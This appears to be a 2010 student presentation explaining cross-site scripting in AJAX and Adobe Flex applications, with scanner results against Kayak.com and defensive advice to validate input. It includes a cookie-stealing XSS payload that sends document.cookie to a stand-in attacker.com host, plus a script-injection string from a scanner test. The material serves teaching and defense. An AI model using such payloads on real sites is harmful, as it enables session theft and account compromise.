Cross-Site Scripting (XSS) Vulnerability in AJAX and Adobe Flex Applications Danielle Cauthen 04/09/2010 COMS E6125 – Web enHanced Information Management What is Cross-Site Scripting? Cross-Site Scripting, or XSS (not to be confused with CSS or Cascading Style Sheets), allows attackers to inject client-side script in a web page. The attacker injects script, such as JavaScript, VBScript, ActiveX, HTML, or Flash into an application to try to get access to sensitive information Dynamic websites (using AJAX, Flex, for example) are vulnerable. Static websites are not at risk. Diagram of XSS Attack *From CGISecurity.com XSS Compared to Other Vulnerabilities XSS is the #1 website security issue, with a 66% percentage likelihood that a website has the vulnerability: Statistics from WhiteHat Website Security Report, Fall 2009 edition XSS Types Two types of XSS attacks: ◦ Nonaltering (or Non Persistent): causes no change to the page functionality ◦ Altering (or Persistent): a script injection that can be placed permanently in the database which causes change to the page functionality that will persist each time the page is requested Non-Altering (Non-Persistant) Attacker can take a URL that contains personal data, i.e. www.website.com/username=danielle and modify the username field by entering JavaScript to steal the cookie, altering the url to www.website.com/username=<script>do cument.location='http://attacker.com/coo kiesteal.cgi?'+document.cookie</script> To diminish suspicion attacker can URL encode JavaScript so it’s not apparent Altering (Persistent) Within a forum, users posts may be stored in a database, usually being tracked by a session id cookie An attacker can post a message containing malicious script, that if a user reads, may compromise their account Threat to AJAX Because of the JavaScript and client-side scripting of AJAX, its largest security risk is XSS From AJAX:The Definitive Guide: ◦ “Before Ajax, any attack made with an XSS vulnerability was done while the user's browser was in a wait state, and it usually coincided with some kind of visual indication by the browser that would give the user reason to think something untoward was happening. ◦ Once Ajax was introduced, this visual cue would disappear, and the user would have no way of knowing whether malicious code was being executed from the browser.” Threat to Adobe Flex Though not as common as with AJAX, Flex has also been prone to cross-site scripting, especially if HTML and other scripting features are used in a Flex application However Adobe, realizing the threat, has strict security in place to prevent XSS. ◦ By default, you cannot call script on an HTML page if the HTML page is not in the same domain as the Flex application. ◦ Since Flex application is compiled into swf, it cannot itself be vulnerable to XSS ◦ The sandbox security model prevents private information being sent elsewhere. Testing for XSS Vulnerabilities Acunetix Web Vulnerability Scanner – tool that scans web applications for XSS vulnerabilities (more useful with AJAX applications) HP SWFScan – tool that is helpful in finding security vulnerabilities in Flex/Flash applications. It decompiles and extracts the code from the .swf file, and then analyzes it for vulnerabilities Testing AJAX Application Using Acunetix, Kayak.com (the AJAX web application for travel comparison) was found to have 146 vulnerabilities Example: when a user clicks on a menu item, such as Flights, that information is submitted as a GET in a variable named tab. Acunetix was able to manipulate this variable numerous times, on one occasion setting tab to <ScRiPt+bad=">"+src="http://testphp.acutenix.com /xss.js?40392"></ScRiPt> Testing AJAX Flex Using HP SWFScan, tested Flex application Sherwin Williams Color Visualizer (www.sherwinwilliams.com/visualizer) No XSS vulnerabilities were found Testing Flex Conclusion XSS can be both damaging and costly while compromising user security XSS is bigger risk to AJAX, due to the JavaScript and client-side scripting Flex is vulnerable but a lot more resistant due to Adobe security features Developers of both AJAX and Flex applications should check and validate any input to ensure it doesn’t include script References Acunetix (2010). Web Vulnerability Scanner [Version 6.5]. Retrieved from http://www.acunetix.com/vulnerability-scanner/download.htm Adobe Systems Incorporated (2004). Cross Site Scripting in Flash. Retrieved from http://kb2.adobe.com/cps/196/tn_19604.html Adobe Systems Incorporated (2008). Adobe Flex Developer's Guide. Retrieved from http://livedocs.adobe.com/flex/3/devguide_flex3.pdf Cgisecurity.com (2002, May). The Cross Site Scripting (XSS) FAQ. Retrieved from http://www.cgisecurity.com/xss-faq.html Hewlett-Packard Development Company, L.P. (2009). SWFScan. Retrieved from http://www.brothersoft.com/hp-swfscan-253747.html Holdener III, Anthony T. (2008). Ajax: The Definitive Guide. Sebastopol, CA: O’Reilly Media WhiteHat Security (2009). WhiteHat Website Security Statistics Report. Retrieved from http://www.whitehatsec.com/home/assets/WPstats_fall09_8th.pdf